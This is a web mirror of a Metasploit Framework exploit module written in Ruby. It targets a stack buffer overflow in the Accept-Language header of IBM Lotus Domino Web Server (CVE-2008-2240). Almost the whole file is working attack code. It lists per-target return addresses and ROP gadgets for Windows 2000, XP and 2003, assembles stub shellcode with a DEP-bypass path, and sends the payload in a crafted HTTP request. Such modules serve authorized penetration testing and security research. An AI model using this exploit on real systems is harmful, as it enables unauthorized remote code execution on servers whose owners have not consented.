CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/lotus/domino_http_accept_language.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'			=> 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',

14
      'Description'		=> %q{

15
          This module exploits a stack buffer overflow in IBM Lotus Domino Web Server

16
        prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP

17
        request with an Accept-Language header greater than 114 bytes.

18
      },

19
      'Author'		=> [ 'Fairuzan Roslan <riaf[at]mysec.org>', '<Earl Marcus klks[at]mysec.org>' ],

20
      'License'		=> MSF_LICENSE,

21
      'References'		=>

22
        [

23
          ['CVE', '2008-2240'],

24
          ['OSVDB', '45415'],

25
          ['BID', '29310'],

26
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],

27
        ],

28
      'DefaultOptions'	=>

29
        {

30
          'EXITFUNC'	=> 'thread',

31
        },

32
      'Privileged'		=> true,

33
      'Payload'		=>

34
        {

35
          'Space'			=> 800,

36
          'BadChars'		=> "\x00\x0a\x20\x2c\x3b",

37
          'StackAdjustment'	=> -3500,

38
        },

39
      'Platform'		=>	'win',

40
      'Targets'		=>

41
        [

42


43
          ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',

44
            {

45
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret	 	@fontmanager.dll

46
              'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll

47
              'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll

48
              'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dl

49
              'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll

50
              'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll

51
            }

52
          ],

53


54
          ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',

55
            {

56
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll

57
              'FixESI'	=> 0x603055da, # push esp, pop esi, ret		@nnotes.dll

58
              'FixEBP'	=> 0x60a8bc90, # push esp, pop ebp, ret 0x10	@nnotes.dll

59
              'Ret'		=> 0x62c838c7, # ret 0x12e			@nlsccstr.dll

60
              'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll

61
              'JmpESP'	=> 0x62c6072e, # jmp esp			@nlsccstr.dll

62
            }

63
          ],

64


65
          ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',

66
            {

67
              'FixESP'	=> 0x70335c79, # add esp, 0x324, ret 		@fontmanager.dll

68
              'JmpESP'	=> 0x62c6072e, # jmp esp			@lsccstr.dll

69
            }

70
          ],

71


72
          ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',

73
            {

74
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll

75
              'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll

76
              'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll

77
              'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll

78
              'DisableNX'	=> 0x7c83e413, # NX Disable			@ntdll.dll

79
              'JmpESP'	=> 0x6391071e, # jmp esp 			@nlsccstr.dll

80
            }

81
          ],

82


83
          ['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',

84
            {

85
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll

86
              'FixESI'	=> 0x639a7f87, # push esp, pop esi, ret		@nlsccstr.dll

87
              'FixEBP'	=> 0x6391c9f7, # push esp, pop ebp, ret 0x10	@nlsccstr.dll

88
              'Ret'		=> 0x7f8b0628, # ret 0x12e			@j9gc23.dll

89
              'DisableNX'	=> 0x7c83f517, # NX Disable			@ntdll.dll

90
              'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll

91
            }

92
          ],

93


94
          ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',

95
            {

96
              'FixESP'	=> 0x7ea0615c, # add esp, 0x324, ret		@net.dll

97
              'JmpESP'	=> 0x6391071e, # jmp esp			@nlsccstr.dll

98
            }

99
          ],

100


101
        ],

102
      'DisclosureDate' => '2008-05-20'))

103
  end

104


105
  def exploit

106
    connect

107


108
    lang = rand_text_alphanumeric(116)				# greetz to hateful chris

109
    lang[ 56,  4 ] = [ 0xfffffffe ].pack('V')			# Fix Second crash (esi)

110
    lang[ 68,  4 ] = [ 0x7ffaf0ec ].pack('V')			# Fix Second crash (eax)

111
    lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V')			# Fix First crash

112
    lang[ 112, 4 ] = [target['FixESP']].pack('V')			# 1

113
    lang << "\x00"

114
    lang << payload.encoded

115


116
    if(not target['DisableNX'])

117
      lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string		# 4

118
      lang[ 80,  4 ] = [target['JmpESP']].pack('V')		# 2

119
      lang[ 84,  2 ] = Rex::Arch::X86.jmp_short(-0x46)	# 3 jmp back to top

120
    else

121
      lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string	# 8

122
      lang[ 80,  4 ] = [target['FixESI']].pack('V')		# 2

123
      lang[ 84,  4 ] = [target['FixEBP']].pack('V')		# 3

124
      lang[ 88,  4 ] = [target['Ret']].pack('V')		# 4

125
      lang[ 92,  4 ] = [target['JmpESP']].pack('V')		# 6

126
      lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56)	# 7  jmp back to top

127
      lang[ 108, 4 ] = [target['DisableNX']].pack('V')	# 5

128
    end

129


130
    uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1)	# Trigger

131


132
    print_status("Trying target #{target.name}...")

133
    send_request_raw({

134
            'uri'			=> "#{uri}",

135
            'method'		=> 'GET',

136
            'headers'		=>

137
            {

138
              'Accept'		=> '*/*',

139
              'Accept-Language'	=> "#{lang}",

140
              'Accept-Encoding'	=> 'gzip,deflate',

141
              'Keep-Alive'		=> '300',

142
              'Connection'		=> 'keep-alive',

143
              'User-Agent'		=> 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',

144
            }

145
          }, 5)

146
    handler

147
    disconnect

148
  end

149
end

150


151